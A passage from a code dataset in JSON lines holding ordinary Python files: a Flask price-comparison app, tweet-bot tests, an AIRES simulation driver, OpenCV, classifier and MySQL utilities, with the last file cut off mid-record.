str(requests.get('https://catfact.ninja/fact').json()['fact'])\n btc = dict()\n btc['eur'] = requests.get('https://api.coindesk.com/v1/bpi/currentprice.json').json()['bpi']['EUR']['rate']\n btc['usd'] = requests.get('https://api.coindesk.com/v1/bpi/currentprice.json').json()['bpi']['USD']['rate']\n btc['gbp'] = requests.get('https://api.coindesk.com/v1/bpi/currentprice.json').json()['bpi']['GBP']['rate']\n\n return render_template('home.html', cat_fact=cat_fact, btc=btc)\n\n@app.route('/products/', methods=['GET'])\n@app.output(ProductsOut(many=True))\ndef return_products(searched_product, store=None):\n \n products = get_products(searched_product)\n \n # Metrics collection\n\n if searched_product not in metrics_data['searched_product_count']:\n metrics_data['searched_product_count'][searched_product] = 0\n metrics_data['searched_product_count'][searched_product] += 1\n\n # Logging\n logger.info(f\"Searched product: {searched_product}\")\n \n return make_response(jsonify(products), 200)\n\n@app.route('/add//', methods=['GET'])\ndef add(product, price):\n flash(f\"New saved product {product}!\", category='info')\n price = int(float(price.replace(\",\", \".\")))\n item = Item(name=product[:30], price=price, barcode=product[:12], description=product, owner=current_user.id)\n with app.app_context():\n db.session.add(item)\n db.session.commit()\n db.session.refresh(item)\n return redirect(url_for('market_page'))\n\n@app.route('/izdelki', methods=['GET', 'POST'])\ndef izdelki_page():\n form = SearchForm()\n products = []\n product_info = \"\"\n\n if request.method == 'POST':\n searched_product = form.searched_product.data\n products = get_products(searched_product)\n\n # Metrics collection\n\n if searched_product not in metrics_data['searched_product_count']:\n metrics_data['searched_product_count'][searched_product] = 0\n metrics_data['searched_product_count'][searched_product] += 1\n\n # Logging\n logger.info(f\"Searched product: {form.searched_product.data}\")\n\n metrics_data['returned_products'] += len(products)\n\n product_info = get_info(searched_product)\n\n return render_template('izdelki.html', form=form, products=products, product_info=product_info)\n\n@app.route('/market')\n@login_required\ndef market_page():\n items = Item.query.all()\n return render_template('market.html', items=items)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register_page():\n form = RegisterForm()\n \n if form.validate_on_submit():\n user_to_create = User(username=form.username.data, email_address=form.email_address.data, password=form.password1.data)\n with app.app_context():\n db.session.add(user_to_create)\n db.session.commit()\n db.session.refresh(user_to_create)\n login_user(user_to_create)\n flash(f\"Account created successfully! Welcome {user_to_create.username}!\", category='info')\n return redirect(url_for('market_page'))\n \n if len(form.errors) > 0:\n for err_msg in form.errors.values():\n flash(err_msg[0], category='danger')\n\n return render_template('register.html', form=form)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login_page():\n form = LoginForm()\n if form.validate_on_submit():\n with app.app_context():\n attempted_user = User.query.filter_by(username=form.username.data).first()\n if attempted_user and attempted_user.check_password(attempted_password=form.password.data):\n login_user(attempted_user)\n flash(message=f\"Welcome back {attempted_user.username}!\", category='success')\n\n # Logging\n logger.info(f\"User {attempted_user.username} logged in.\")\n\n return redirect(url_for('market_page'))\n else:\n flash(\"Username and password don't match! Please try again.\", category='danger')\n\n return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout_page():\n logout_user()\n flash(\"You've logged out.\", category='info')\n\n # Logging\n logger.info(f\"User logged out.\")\n\n return redirect(url_for('home_page'))\n\n# Health checks\n# Live\n@app.route('/health/live')\n@app.output(LiveOut)\ndef health_live():\n return make_response(jsonify(live=True), 200)\n\n# Ready\n@app.route('/health/ready')\n@app.output(ReadyOut)\ndef health_ready():\n try:\n with app.app_context():\n db.session.execute(\"SELECT 1\")\n\n return make_response(jsonify(ready=True), 200)\n\n except Exception as e:\n # 503 - Service unavailable\n return make_response(jsonify(erros=e), 503)\n\n# Metrics\n@app.route('/metrics')\ndef metrics():\n return make_response(jsonify(metrics_data), 200)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404","repo_name":"maticsuc/primerjalnik_cen","sub_path":"primerjalnik/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19085064310","text":"#!/usr/bin/env python3\n\"\"\"\nTests for tweet_bot\n\"\"\"\nimport time\nfrom datetime import datetime\n\nimport pytest\n\nfrom tweet_bot import __version__\nimport tweet_bot.temperature_tweet_bot as bot\nimport tweet_bot.twitter_api as twit\nimport tweet_bot.tmp75b_temperature as tmp75b\n\n\ndef test_version():\n \"\"\" Check the module version is correct\n \"\"\"\n assert __version__ == '0.1.0'\n\n\n@pytest.fixture(name='api')\ndef fixture_api():\n \"\"\" Get a tweepy api object for use in\n the following tests\n \"\"\"\n return twit.authenticate()\n\n\ndef test_auth(api):\n \"\"\" Check that we have authenticated\n with the twitter api\n \"\"\"\n assert api is not None\n\n\ndef test_post_and_delete_tweet(api):\n \"\"\" Post a tweet and then delete it\n \"\"\"\n tweet_str = f'{time.time()} : Hello from Keith'\n new_tweet = twit.post_tweet(api, tweet_str)\n assert new_tweet is not None\n assert twit.delete_tweet(api, new_tweet.id) is not None\n\n\ndef test_get_public_tweets(api):\n \"\"\" Get a list of tweets\n \"\"\"\n tweets = twit.get_tweets(api)\n assert tweets is not None\n for tweet in tweets:\n print(tweet.text)\n\n\ntest_vals = [\n (0b1111000001111111, 127.9375),\n (0b0000000001100100, 100),\n (0b0000000000000000, 0),\n (0b1100000011111111, -0.25),\n (0b0000000011100111, -25),\n (0b0000000010000000, -128)\n]\n\n\n@pytest.mark.parametrize(\"test_input, expected\", test_vals)\ndef test_raw_temp_to_float(test_input, expected):\n \"\"\" Test convertion of raw temperature values\n to floats.\n \"\"\"\n assert tmp75b.convert_raw_temp_to_float(test_input) == expected\n\n\ntemp_state_vals = [\n (bot.SP1 - 1, 'LOW', 'LOW'), # Low and rising slowly to Nominal\n (bot.SP1 - 0.5, 'LOW', 'LOW'),\n (bot.SP1 + 0, 'LOW', 'LOW'),\n (bot.SP1 + 0.5, 'LOW', 'NOMINAL'),\n (bot.SP1 + 0, 'NOMINAL', 'NOMINAL'), # Now drop back to Low\n (bot.SP1 - 0.5, 'NOMINAL', 'NOMINAL'),\n (bot.SP1 - 1.0, 'NOMINAL', 'LOW'),\n (bot.SP2 - 1, 'NOMINAL', 'NOMINAL'), # Now test Nominal to High\n (bot.SP2 - 0.5, 'NOMINAL', 'NOMINAL'),\n (bot.SP2 + 0, 'NOMINAL', 'NOMINAL'),\n (bot.SP2 + 0.5, 'NOMINAL', 'NOMINAL'),\n (bot.SP2 + 1.0, 'NOMINAL', 'HIGH'), # Now drop back down to Nominal\n (bot.SP2 + 0.5, 'HIGH', 'HIGH'),\n (bot.SP2 + 0, 'HIGH', 'HIGH')\n]\n\n\n@pytest.mark.parametrize(\"temperature, prev_state, state\", temp_state_vals)\ndef test_state_with_hysteresis(temperature, prev_state, state):\n \"\"\" Test that the hysteresis works\n \"\"\"\n assert bot.state_with_hysteresis(\n pvar=temperature,\n prev_state=prev_state) == state\n\n\nis_midday_test_vals = [\n (datetime(2021, 7, 11, hour=10, minute=0), False),\n (datetime(2021, 7, 11, hour=11, minute=44), False),\n (datetime(2021, 7, 11, hour=11, minute=45), True),\n (datetime(2021, 7, 11, hour=12, minute=00), True),\n (datetime(2021, 7, 11, hour=12, minute=15), True),\n (datetime(2021, 7, 11, hour=12, minute=16), False),\n]\n\n\n@pytest.mark.parametrize(\"now_dt, expected\", is_midday_test_vals)\ndef test_is_midday(now_dt, expected):\n \"\"\" Test that is_midday works\n \"\"\"\n assert bot.is_midday(now=now_dt) == expected\n","repo_name":"krgough/tweet_bot","sub_path":"tests/test_twitter_lib.py","file_name":"test_twitter_lib.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19083315985","text":"import random\r\nimport time\r\n\r\nimport speech_recognition as sr\r\n\r\n # create recognizer and mic instances\r\nrecognizer = sr.Recognizer()\r\nmicrophone = sr.Microphone()\r\nwhile True:\r\n print('Speak!')\r\n #guess = recognize_speech_from_mic(recognizer, microphone) \r\n #print(\"You said: {}\".format(guess[\"transcription\"]))\r\n with microphone as source:\r\n recognizer.adjust_for_ambient_noise(source)\r\n audio = recognizer.listen(source)\r\n recog_audio=recognizer.recognize_google(audio)\r\n print(\"You said:\",recog_audio)\r\n\r\n if(recog_audio=='stop'):\r\n break\r\n\r\n # determine if guess is correct and if any attempts remain\r\n ","repo_name":"shubham-garad/OpenCV_face_detection_and_recognition","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13530470040","text":"\"\"\"\nAuthor: Miguel Cruces\ne-mails:\n- miguel.cruces.fernandez@usc.es\n- mcsquared.fz@gmail.com\n\"\"\"\n\nfrom library.update_model import CookModel\nfrom library.update_tables import CookTables\nfrom library.update_aires_input import CookAiresINP\nfrom library.represent import CookingDataAIRES, MergeData, Represent, grdpcles_dat\nfrom utils.constants import ROOT_DIR\n\nimport json\nimport os\nimport sys\nfrom os.path import join as join_path\nimport numpy as np\nimport pandas as pd\n\n# Add ROOT_DIR to $PATH\nif ROOT_DIR not in sys.path:\n sys.path.append(ROOT_DIR)\n\n# Read Configurations from config.json\nwith open(\"utils/config.json\", \"r\") as config_file:\n config = json.load(config_file)\n\n# First, we create the directory ROOT_DIR/AiresINP:\naires_inp_path = join_path(ROOT_DIR, \"AiresINP\")\nif not os.path.exists(aires_inp_path):\n os.mkdir(aires_inp_path)\n\n# And the directory ROOT_DIR/OUTPUT:\noutput_full_path = join_path(ROOT_DIR, \"OUTPUT\")\nif not os.path.exists(output_full_path):\n os.mkdir(output_full_path)\n\n# And the directory ROOT_DIR/SUMMARY:\nsry_full_path = join_path(ROOT_DIR, \"SUMMARY\")\nif not os.path.exists(sry_full_path) and config[\"SRY_dir\"]:\n os.mkdir(sry_full_path)\n\n# Read input data\ninput_file_name = config[\"InputFileName\"]\ninput_df = None\nif input_file_name.endswith(\".txt\"):\n input_df = pd.read_csv(input_file_name, index_col=0, header=0, delim_whitespace=True, na_values=\"(missing)\")\nelif input_file_name.endswith(\".csv\"):\n input_df = pd.read_csv(\"densidades2019.csv\", index_col=0, sep=\";\")\nelse:\n quit(0)\n\n\ndef call_merger(ons: list):\n \"\"\"\n Merges data from the list of muons(+), muons(-), positrons(+) and electrons(-)\n\n :param ons: list of dictionaries {\"path\": \"...\", \"file\": ...}\n :return: It is a void function.\n \"\"\"\n if len(ons) == 2:\n ons0 = CookingDataAIRES(in_path=ons[0][\"path\"], file=ons[0][\"file\"])\n ons1 = CookingDataAIRES(in_path=ons[1][\"path\"], file=ons[1][\"file\"])\n merged_ons = MergeData(ons0, ons1)\n Represent(merged_ons, out_path=output_full_path, task_name=task)\n elif len(ons) == 1:\n ons = CookingDataAIRES(in_path=ons[0][\"path\"], file=ons[0][\"file\"])\n Represent(ons, out_path=output_full_path, task_name=task)\n else:\n print(\"There aren't particles to merge data\")\n\n\n# Define empty array to store angles information\nhits_by_angle = np.zeros([0, 19 * 3]) # 19 bins from 0 to 95 degrees, 3 types of particles\n\n# Now inside AiresINP, the directories for any simulation\nfor row in input_df.iterrows():\n dir_name = row[0] # Date is the name for any directory of simulation (its task name)\n dir_path = join_path(aires_inp_path, dir_name)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n\n try:\n temp_0 = row[1][\"Temp-0\"]\n except Exception as e:\n temp_0 = config[\"model\"][\"grd_temp\"]\n\n # Create file model.inp\n CookModel(save_path=dir_path,\n input_df_row=row[1],\n atm_ident=config[\"model\"][\"atm_ident\"],\n atm_name=config[\"model\"][\"atm_name\"],\n grd_temp=temp_0) # config[\"model\"][\"grd_temp\"])\n # Create file tables.inp\n CookTables(save_path=dir_path,\n print_ids=config[\"tables\"][\"print\"],\n export_ids=config[\"tables\"][\"export\"])\n # Create file task.inp\n CookAiresINP(task_name=dir_name, save_path=dir_path)\n\n # Execute Aires\n os.system(f\"cd {dir_path}; Aires < {dir_name}.inp\") # It Works\n\n # Execute gfortran for uncompress .grdpcles data from bash\n os.system(f\"cd {dir_path}; \"\n \"gfortran -o grdpcles_map ../../utils/grdpcles_reader.f -L${HOME}\"\n f\"/aires/{config['AiresVersion']}/lib/ -lAires -lgfortran\")\n os.system(f\"cd {dir_path}; \"\n \"./grdpcles_map << XX1\\n\"\n f\"{dir_name}.grdpcles\\n\" # Input file\n f\"{dir_name}.dat\\n\" # Output file\n \"10000. 10000.\\n\" # Size of grid x and y (m)\n \"25.\\n\" # Step (m)\n \"5\\n\" # Number of showers\n \"XX1\")\n if config[\"SRY_dir\"]: # Copy any taskname.sry to ROOT_DIR/SUMMARY/\n os.system(f\"cd {dir_path};\"\n f\"cp {dir_name}.sry {sry_full_path}\")\n\n # Save angles data on ./angles_distribution.txt\n gamma_hist, elect_hist, muons_hist = grdpcles_dat(dir_path=dir_path, dir_name=dir_name, save_plots=True, deg=True)\n row = np.hstack((gamma_hist, elect_hist, muons_hist))\n hits_by_angle = np.vstack((hits_by_angle, row))\n # break # Works Only for First Simulation\n\nnp.savetxt(fname=\"angles_distribution.txt\", X=hits_by_angle, fmt='%04d')\n\n# For any task are crated the histograms and saved on ROOT_DIR/OUTPUT\nfor task in os.listdir(aires_inp_path):\n task_full_dir = join_path(aires_inp_path, task)\n trons = [] # trons: positrons (+), electrons (-)\n muons = [] # muons: muons (+), muons (-)\n for file in os.listdir(task_full_dir):\n if file[-6:-4] == \".t\":\n if file.endswith(\"2505\") or file.endswith(\"2506\"):\n trons.append({\"path\": task_full_dir, \"file\": file})\n elif file.endswith(\"2507\") or file.endswith(\"2508\"):\n muons.append({\"path\": task_full_dir, \"file\": file})\n elif file.endswith(\"5513\"):\n pass\n else:\n try:\n data = CookingDataAIRES(in_path=task_full_dir, file=file, e_units=config[\"plots\"][\"E_units\"])\n Represent(data, out_path=output_full_path, task_name=task)\n print(f\"Represented {file}\")\n except KeyError:\n print(f\"Some error in CookingDataAires with file {file}\")\n # For any task:\n call_merger(muons) # muons(+) and muons(-)\n call_merger(trons) # positrons(+) and electrons(-)\n # are merged.\n","repo_name":"TrasgoGroup/TRISTAN-journey-simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45180913108","text":"import cv2\r\nimport numpy as np\r\n#讀入相片檔案\r\nimage = cv2.imread(\"contours1.png\")\r\n\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n#blurred = cv2.GaussianBlur(gray, (11, 11), 0)\r\n#binaryIMG = cv2.Canny(blurred, 20, 160)\r\n\r\n(cnts, _) = cv2.findContours(gray.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n#(cnts, _) = cv2.findContours(binaryIMG.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\nclone = image.copy()\r\ncv2.drawContours(clone, cnts, -1, (0, 255, 0), 2)\r\n\r\nfor c in cnts: \r\n mask = np.zeros(gray.shape, dtype=\"uint8\") #依Contours圖形建立mask\r\n cv2.drawContours(mask, [c], -1, 255, -1) #255 →白色, -1→塗滿\r\n\r\n # show the images\r\n cv2.imshow(\"Image\", image)\r\n cv2.imshow(\"Mask\", mask)\r\n\r\n#將mask與原圖形作AND運算\r\n cv2.imshow(\"Image + Mask\", cv2.bitwise_and(image, image, mask=mask)) \r\n cv2.waitKey(0)\r\ncv2.destroyAllWindows() \r\n\r\n\r\n","repo_name":"WeiJ-Han/distribution-technology-management","sub_path":"ball-tracking/Edge and Contours/contours1.py","file_name":"contours1.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73698195364","text":"\"\"\"Timed Supervised Optimum-Path Forest.\n\"\"\"\n\nimport time\n\nimport numpy as np\n\nimport opfython.utils.constants as c\nimport opfython.utils.exception as e\nimport opfython.utils.logging as log\nfrom opfython.core import Heap, Subgraph\nfrom opfython.models import SupervisedOPF\n\nlogger = log.get_logger(__name__)\n\n\nclass TimedOPF(SupervisedOPF):\n \"\"\"A TimedOPF which implements the timed version of Supervised OPF classifier.\n\n \"\"\"\n\n def __init__(self, distance='log_squared_euclidean', pre_computed_distance=None):\n \"\"\"Initialization method.\n\n Args:\n distance (str): An indicator of the distance metric to be used.\n pre_computed_distance (str): A pre-computed distance file for feeding into OPF.\n\n \"\"\"\n\n logger.info('Overriding class: SupervisedOPF -> TimedOPF.')\n\n # Override its parent class with the receiving arguments\n super(TimedOPF, self).__init__(distance, pre_computed_distance)\n\n logger.info('Class overrided.')\n\n def fit(self, X_train, Y_train, I_train=None):\n \"\"\"Fits data in the classifier.\n\n Args:\n X_train (np.array): Array of training features.\n Y_train (np.array): Array of training labels.\n I_train (np.array): Array of training indexes.\n\n \"\"\"\n\n logger.info('Fitting classifier ...')\n\n # Initializing the timer\n start = time.time()\n\n # Creating a subgraph\n self.subgraph = Subgraph(X_train, Y_train, I=I_train)\n\n # Finding prototypes\n self._find_prototypes()\n\n # Creating a minimum heap\n h = Heap(size=self.subgraph.n_nodes)\n\n # For each possible node\n for i in range(self.subgraph.n_nodes):\n # Checks if node is a prototype\n if self.subgraph.nodes[i].status == c.PROTOTYPE:\n # If yes, it does not have predecessor nodes\n self.subgraph.nodes[i].pred = c.NIL\n\n # Its predicted label is the same as its true label\n self.subgraph.nodes[i].predicted_label = self.subgraph.nodes[i].label\n\n # Its cost equals to zero\n h.cost[i] = 0\n\n # Inserts the node into the heap\n h.insert(i)\n\n # If node is not a prototype\n else:\n # Its cost equals to maximum possible value\n h.cost[i] = c.FLOAT_MAX\n\n # While the heap is not empty\n while not h.is_empty():\n # Removes a node\n p = h.remove()\n\n # Appends its index to the ordered list\n self.subgraph.idx_nodes.append(p)\n\n # Gathers its cost\n self.subgraph.nodes[p].cost = h.cost[p]\n\n # For every possible node\n for q in range(self.subgraph.n_nodes):\n # If we are dealing with different nodes\n if p != q:\n # If `p` node cost is smaller than `q` node cost\n if h.cost[p] < h.cost[q]:\n # Checks if we are using a pre-computed distance\n if self.pre_computed_distance:\n # Gathers the distance from the distance's matrix\n weight = self.pre_distances[self.subgraph.nodes[p].idx][self.subgraph.nodes[q].idx]\n\n # If the distance is supposed to be calculated\n else:\n # Calls the corresponding distance function\n weight = self.distance_fn(\n self.subgraph.nodes[p].features, self.subgraph.nodes[q].features)\n\n # The current cost will be the maximum cost between the node's and its weight (arc)\n current_cost = np.maximum(h.cost[p], weight)\n\n # If current cost is smaller than `q` node's cost\n if current_cost < h.cost[q]:\n # `q` node has `p` as its predecessor\n self.subgraph.nodes[q].pred = p\n\n # And its predicted label is the same as `p`\n self.subgraph.nodes[q].predicted_label = self.subgraph.nodes[p].predicted_label\n\n # Updates the heap `q` node and the current cost\n h.update(q, current_cost)\n\n # The subgraph has been properly trained\n self.subgraph.trained = True\n\n # Ending timer\n end = time.time()\n\n # Calculating training task time\n train_time = end - start\n\n logger.info('Classifier has been fitted.')\n logger.info('Training time: %s seconds.', train_time)\n\n return train_time\n\n def predict(self, X_val, I_val=None):\n \"\"\"Predicts new data using the pre-trained classifier.\n\n Args:\n X_val (np.array): Array of validation or test features.\n I_val (np.array): Array of validation or test indexes.\n\n Returns:\n A list of predictions for each record of the data.\n\n \"\"\"\n\n # Checks if there is a subgraph\n if not self.subgraph:\n # If not, raises an BuildError\n raise e.BuildError('Subgraph has not been properly created')\n\n # Checks if subgraph has been properly trained\n if not self.subgraph.trained:\n # If not, raises an BuildError\n raise e.BuildError('Classifier has not been properly fitted')\n\n logger.info('Predicting data ...')\n\n # Initializing the timer\n start = time.time()\n\n # Creating a prediction subgraph\n pred_subgraph = Subgraph(X_val, I=I_val)\n\n # For every possible node\n for i in range(pred_subgraph.n_nodes):\n # Initializing the conqueror node\n conqueror = -1\n\n # Initializes the `j` counter\n j = 0\n\n # Gathers the first node from the ordered list\n k = self.subgraph.idx_nodes[j]\n\n # Checks if we are using a pre-computed distance\n if self.pre_computed_distance:\n # Gathers the distance from the distance's matrix\n weight = self.pre_distances[self.subgraph.nodes[k].idx][pred_subgraph.nodes[i].idx]\n\n # If the distance is supposed to be calculated\n else:\n # Calls the corresponding distance function\n weight = self.distance_fn(\n self.subgraph.nodes[k].features, pred_subgraph.nodes[i].features)\n\n # The minimum cost will be the maximum between the `k` node cost and its weight (arc)\n min_cost = np.maximum(self.subgraph.nodes[k].cost, weight)\n\n # The current label will be `k` node's predicted label\n current_label = self.subgraph.nodes[k].predicted_label\n\n # While `j` is a possible node and the minimum cost is bigger than the current node's cost\n while j < (self.subgraph.n_nodes - 1) and min_cost > self.subgraph.nodes[self.subgraph.idx_nodes[j+1]].cost:\n # Gathers the next node from the ordered list\n l = self.subgraph.idx_nodes[j+1]\n\n # Checks if we are using a pre-computed distance\n if self.pre_computed_distance:\n # Gathers the distance from the distance's matrix\n weight = self.pre_distances[self.subgraph.nodes[l].idx][pred_subgraph.nodes[i].idx]\n\n # If the distance is supposed to be calculated\n else:\n # Calls the corresponding distance function\n weight = self.distance_fn(\n self.subgraph.nodes[l].features, pred_subgraph.nodes[i].features)\n\n # The temporary minimum cost will be the maximum between the `l` node cost and its weight (arc)\n temp_min_cost = np.maximum(self.subgraph.nodes[l].cost, weight)\n\n # If temporary minimum cost is smaller than the minimum cost\n if temp_min_cost < min_cost:\n # Replaces the minimum cost\n min_cost = temp_min_cost\n\n # Gathers the identifier of `l` node\n conqueror = l\n\n # Updates the current label as `l` node's predicted label\n current_label = self.subgraph.nodes[l].predicted_label\n\n # Increments the `j` counter\n j += 1\n\n # Makes `k` and `l` equals\n k = l\n\n # Node's `i` predicted label is the same as current label\n pred_subgraph.nodes[i].predicted_label = current_label\n\n # Checks if any node has been conquered\n if conqueror > -1:\n # Marks the conqueror node and its path\n self.subgraph.mark_nodes(conqueror)\n\n # Creating the list of predictions\n preds = [pred.predicted_label for pred in pred_subgraph.nodes]\n\n # Ending timer\n end = time.time()\n\n # Calculating prediction task time\n predict_time = end - start\n\n logger.info('Data has been predicted.')\n logger.info('Prediction time: %s seconds.', predict_time)\n\n return preds, predict_time\n","repo_name":"gugarosa/opf_speedup","sub_path":"utils/timed_opf.py","file_name":"timed_opf.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2408734799","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom train import binary_gauss,binary_mulinomial,BinaryRelevance,clf_chain_model,clf_labelP_model,randomForest_Model,classify_complaint\n\n# for random forest\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# from numpy.core.overrides import array_function_from_dispatcher\ndef classifyComplain(complain):\n str_comp=complain\n tfidf = TfidfVectorizer()\n complain = tfidf.transform([complain])\n ans=[0,0,0,0,0,0,0,0,0]\n\n \n mod1=binary_mulinomial.predict(complain).A[0]\n mod2=binary_gauss.predict(complain).A[0]\n mod3=clf_chain_model.predict(complain).A[0]\n mod4=clf_labelP_model.predict(complain)\n \n # # Random forest\n\n rf = RandomForestClassifier(n_estimators=100, random_state=0)\n multi_target_forest = MultiOutputClassifier(rf, n_jobs=-1)\n randomforest_rf=randomForest_Model(multi_target_forest)\n mod5=randomforest_rf.predict(complain)\n # #with no parameters\n \n random_forest=RandomForestClassifier()\n randomforest_rf=randomForest_Model(random_forest) \n mod6=randomforest_rf.predict(complain)\n \n \n customLab=classify_complaint(str_comp)\n\n \n for i in range(0,8):\n ans[i]=mod1[i]+mod2[i]+mod3[i]+mod5[0][i]+mod6[0][i]+customLab[i]\n return ans\n\nex=\"the roads are really bad\"\nans=classifyComplain(ex)\nprint(\"ans\")","repo_name":"WinRAUL/final_year","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18321591197","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import Counter\n\n# Complete the triplets function below.\ndef triplets(a, b, c):\n ai = bi = ci = 0\n\n a = list(sorted(set(a)))\n b = list(sorted(set(b)))\n c = list(sorted(set(c)))\n la = len(a)\n lb = len(b)\n lc = len(c)\n\n ans = 0\n\n # p = a[i]\n # q = b[j]\n # r = c[k]\n\n while bi < lb:\n while ai < la and a[ai] <= b[bi]:\n ai += 1\n while ci < lc and c[ci] <= b[bi]:\n ci += 1\n\n ans += ai * ci\n\n bi += 1\n\n return ans\n\n\n\n return ans\n\n\nif __name__ == '__main__':\n fptr = open('./tests/TripleSum0.txt', 'r')\n\n lenaLenbLenc = fptr.readline().split()\n\n lena = int(lenaLenbLenc[0])\n\n lenb = int(lenaLenbLenc[1])\n\n lenc = int(lenaLenbLenc[2])\n\n arra = list(map(int, fptr.readline().rstrip().split()))\n\n arrb = list(map(int, fptr.readline().rstrip().split()))\n\n arrc = list(map(int, fptr.readline().rstrip().split()))\n\n ans = triplets(arra, arrb, arrc)\n\n print(ans)\n","repo_name":"lukaszbednarz/HackerRankWarmUp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35597849977","text":"import pymysql\nimport time\nfrom urllib.parse import urlparse\n\n\nclass CrymePipelinesMySqlConn:\n \"\"\"\n A Wrapping class around the pymysql connection object to improve resilience of the pipelines\n and manage the config around connection setup.\n \"\"\"\n def __init__(self, uri):\n self.conn = None\n self.uri = uri\n self.connect()\n\n def connect(self):\n conn_params = urlparse(self.uri)\n self.conn = pymysql.connect(\n host=conn_params.hostname,\n port=conn_params.port,\n database=conn_params.path.replace('/', ''),\n user=conn_params.username,\n password=conn_params.password,\n cursorclass=pymysql.cursors.DictCursor,\n )\n\n def cursor(self, *args, **kwargs):\n\n try:\n return self.conn.cursor()\n except Exception:\n try:\n self._reconnect()\n return self.conn.cursor()\n except Exception as e:\n raise e\n\n def _reconnect(self, attempts=10, timeout=30):\n attempt = 0\n start_time = time.time()\n\n while attempt < attempts or time.time() - start_time > timeout:\n try:\n self.connect()\n break\n except Exception:\n attempt += 1\n\n if attempt == attempts:\n raise Exception(\"Unable to connect to db.\")\n\n\n","repo_name":"bwhitesell/Chaperone","sub_path":"crymepipelines/src/shared/db/mysql/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"31097321361","text":"import copy\r\n\r\n\r\nclass WrongSettingValue(BaseException):\r\n \"\"\"\r\n Error for a case when value of an exception is being set\r\n to one that is not in possible values.\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass Setting:\r\n \"\"\"\r\n Class representing a setting.\r\n \"\"\"\r\n def __init__(self, setting_name, possible_values, current_value, description, possible_values_str=None):\r\n \"\"\"\r\n Initialise Setting by its string name, possible values, current value, description. possible_values\r\n can be list or function. If possible_values is list and can fit in short space (subjectively),\r\n possible_values_str can remain None. Otherwise possible_values_str are string representation of all possible\r\n values which is able to explain them and fit on screen. If possible_values is a function and\r\n possible_values_str remains None, ValueError will be raised.\r\n Description is a description of a setting.\r\n possible_values can be list of str or function.\r\n :param setting_name: str\r\n :param possible_values: list of str or function\r\n :param current_value: str\r\n :param possible_values_str: NoneType or str\r\n \"\"\"\r\n # Checking if input is correct:\r\n if not isinstance(setting_name, str):\r\n raise ValueError(\"Name of a setting must be string.\")\r\n elif not isinstance(current_value, str):\r\n raise ValueError(\"Current value of a setting must be str.\")\r\n elif not isinstance(description, str):\r\n raise ValueError(\"Description of a setting must be str.\")\r\n\r\n # Getting possible values:\r\n possible_values_func, possible_values_str = self._set_possible_values(possible_values, possible_values_str)\r\n\r\n # Saving all values:\r\n self._setting_name = setting_name\r\n self._possible_values_func = possible_values_func\r\n self._possible_values_str = possible_values_str\r\n\r\n # Setting current value:\r\n if self._possible_values_func(current_value):\r\n self._current_value = current_value\r\n else:\r\n raise ValueError(\"Current value not in possible values!\")\r\n\r\n # Setting description:\r\n self._description = description\r\n\r\n def get_setting_name(self):\r\n \"\"\"\r\n Return string name of the setting.\r\n :return: str\r\n \"\"\"\r\n return self._setting_name\r\n\r\n def get_current_value(self):\r\n \"\"\"\r\n Return current value of the setting.\r\n :return: str\r\n \"\"\"\r\n return self._current_value\r\n\r\n def get_description(self):\r\n \"\"\"\r\n Return description of a current setting.\r\n :return: str\r\n \"\"\"\r\n return self._description\r\n\r\n def __str__(self):\r\n \"\"\"\r\n Return string representation of a Setting. It looks\r\n like this:\r\n some_setting = \"On\" [\"On, \"Off\", \"Unknown\"]\r\n :return: str\r\n \"\"\"\r\n return '{} = \"{}\" {}\\n{}'.format(self._setting_name,\r\n self._current_value,\r\n self._possible_values_str,\r\n self.get_description())\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Return string information about the setting so that it\r\n can be written into a text file to save it. Only name\r\n of the setting and current value are recorded - files are\r\n for modifying settings, not creating them. Example:\r\n some_setting = On\r\n\r\n (no parentheses)\r\n :return: str\r\n \"\"\"\r\n return \"{} = {}\".format(self._setting_name,\r\n self._current_value)\r\n\r\n @staticmethod\r\n def _set_possible_values(possible_values, possible_values_str):\r\n \"\"\"\r\n Return tuple with two elements: function func_1(a), which returns True if a is in possible_values, and\r\n with string representation of possible values.\r\n :param possible_values: func or list\r\n :param 